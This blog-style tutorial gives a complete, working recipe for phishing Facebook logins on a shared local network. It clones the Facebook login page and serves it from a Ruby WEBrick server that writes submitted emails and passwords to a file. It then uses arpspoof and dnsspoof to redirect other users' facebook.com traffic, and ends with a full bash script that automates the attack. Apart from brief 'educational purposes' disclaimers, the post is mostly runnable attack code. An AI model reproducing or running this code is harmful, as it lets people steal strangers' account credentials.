I was inspired to write this post after reading an article in the Autumn issue of 2600 that detailed using an iPhone to perform a similar attack - it is remarkably simple to perform; and frankly quite scarily effective.

Before we get started, I’d like to offer up to obvious disclaimer: this is for educational purposes only - use this for good, not evil, and don’t do this in a public place if you don’t want to face the legal consequences.

The attack will consist of three primary components. First we’ll need a small webserver to serve our phishing page and to record the usernames and passwords that are entered. Next, we’ll need to actually perform the DNS lookup attack, and finally we’ll use a shell script to tie it all together.

The author of the original article used lighttpd and php-cgi which worked fine for his purposes, but seemed a little heavyweight to me. Additionally, Macs don’t ship with lighttpd and php-cgi already set up. To minimize the need to install things, I elected to use Ruby - as it comes preinstalled on Macs and is bundled with the lightweight WEBrick server. The first thing we need to do is find the page we’d like to phish - for this example we’ll use Facebook’s login page. Go to facebook.com and do a Save As “web page complete.” This will pull down the page markup and static assets. If you use chrome it will separate static assets into a folder, and adjust the paths accordingly in the html file. For simplicity’s sake I went ahead and combined them all into one directory and changed the paths to match. Next, you’ll want to rename your login page’s html file to index.html. If you open up the html file and find the login form you’ll see that it does a post to login.php - remove the https://www.facebook.com from the destination and leave the rest in tact. Now that we have our copy of the static login page ready to go - we need something to serve it up. As I said before, we’ll use Ruby’s built in WEBrick server.

1
2
3
4
5
6
7

require 'webrick'
include WEBrick
server = HTTPServer.new({:DocumentRoot => ARGV[0]})
['INT', 'TERM'].each {|signal|
  trap(signal) {server.shutdown}
}
server.start

As you can see here we’re just starting up a simple server and serving static assets out of a folder specified as a command line argument. When we run the server you’ll need to point it to the folder you stored the Facebook login details on. Assuming you’ve put the login files in a folder called loginfiles you can run the server like so:

1

ruby server.rb loginfiles/

If you navigate to localhost - you’ll see the Facebook login page. Neat! But we’re not done yet. Next we need to log the credentials of people who try to use our form. To do this we can mount a handler in WEBrick that responds to the login.php resource that the form is already posting to. The server with the new handler looks like so:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

require 'webrick'
include WEBrick

server = HTTPServer.new({:DocumentRoot => ARGV[0]})
['INT', 'TERM'].each {|signal|
  trap(signal) {server.shutdown}
}

server.mount_proc('/login.php', Proc.new {|req, resp|
  File.open(ARGV[1], 'a') {|f| f.write("#{req.query['email']} :: #{req.query['pass']}\n") }
  resp.body = '<html><body><h1>503 Service Unavailable</h1></body></html>'
})

server.start

Now the server will take the email and password entered into the form and save them to a file that you specify as the second argument to the server. Note that email and pass correspond to the fields on the login form. If you are using a different login form, you will need to adjust yours to match.

Go ahead and run the server again:

1

ruby server.rb loginfiles/ captured

Now if you navigate to localhost and submit the login form, you will be directed to a 503 Service Unavailable page and the credentials you entered will be logged in a file called ‘captured’ in whatever directory you started the server. This is pretty cool, but we’re only halfway done - without our DNS spoofing attack, we can’t convince anyone to use our login form.

For the next part of this article I’m going to assume you’re using your wireless adaptor on your Mac. If you’re using a different interface (wired for instance), you’ll need to adjust the scripts accordingly.

We’ll need two IP addresses to perform this attack correctly - the IP of your computer on the local network and the IP of the router. Both are easily attained through the command line. You can get your IP using ifconfig as follows:

1

ifconfig en1 | grep "inet " | awk '/inet/ { print $2 }'

Make a note of it. Next, you can get your router’s IP using netstat like so:

1

netstat -rn | awk '{if($1=="default") print $2}'

If you aren’t on a Mac you may need to search for 0.0.0.0 instead of default. Now that we have those two addresses, we’re ready to perform our attack. First, we need to respond to ARP requests on the local network in order to impersonate the router. Next, we’ll need to respond to DNS requests that get sent to us. For our purposes, we want to spoof the IP address of facebook.com to be our own computer, running WEBrick, while letting all other requests pass through as normal so as not to attract undue attention. As luck would have it dnsspoof (included in the dsniff package of security tools) has exactly this behavior. You can pass it a hosts file mapping IPs to servernames, and anything that isn’t matched gets forwarded as normal. To respond to the ARP requests we’ll use another tool in the dsniff suite: arpspoof. To get started, go ahead and set up a host file, in it simply put YOUR_IP *.facebook.com where YOUR_IP is the IP of your own computer that you recorded earlier. Save it as dnsspoof.conf. We’re now ready to start the DNS spoofing attack. If you type:

1

 arpspoof -i en1 $YOUR_ROUTER_IP | dnsspoof -i en1 -f dnsspoof.conf

Where $YOUR_ROUTER_IP is the router IP you recorded earlier, the attack will start. It will not affect your computer, but for any other computer on the network - facebook.com will resolve to your computer instead of the actual server. If you’re running WEBrick, it will show the seemingly normal looking login page. When they try to log in, it will show a 503 error and their credentials will be saved. Pretty scary how easy that is right? If you’re astute, you may notice one problem - no addresses OTHER than facebook.com resolve - this is because the Mac doesn’t have IP forwarding enabled by default, but this is easy to fix (though you should probably turn it back off when you’re finished) with a simple command:

1

sysctl -w net.inet.ip.forwarding=1

For convenience’s sake, and to facilitate easy cleanup - I have wrapped all the above behavior into a bash script. It assumes your Ruby file is named server.rb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

IP=`ifconfig en1 | grep "inet " | awk '/inet/ { print $2 }'`
ROUTER=`netstat -rn | awk '{if($1=="default") print $2}'`
URL=*.facebook.com

echo "[>>>] Writing dnsspoof.conf"

echo "$IP""   ""$URL" > dnsspoof.conf

sleep 2

echo "[>>>] Launching Attack"
echo "[>>>] Starting webrick"

ruby server.rb $1 $2 &
RUBYPID=$!

sleep 2

echo "[>>>] Enable IP Forwarding"
sysctl -w net.inet.ip.forwarding=1

sudo arpspoof -i en1 $ROUTER | sudo dnsspoof -i en1 -f dnsspoof.conf

echo "[>>>] Killing webrick"
kill $RUBYPID

echo "[>>>] Cleaning up"
rm dnsspoof.conf

echo "[>>>] Disable IP Forwarding"
sysctl -w net.inet.ip.forwarding=0

You will probably have to sudo to run it as it accesses your network stack, and you will need to pass along the two arguments that your webserver needs. So, assuming you’ve named it phish.sh, you can run it as follows: sudo ./phish.sh loginstuff/ credentials. You can of course stop the attack with ctrl-c.

Its scary how effective such a simple attack can be. As I said before, this is for educational purposes only - if you try to do this to someone (which I advise against on ethical grounds anyways) - you do it at your own risk. It would be incredibly easy to get caught as this attack makes zero effort to hide itself.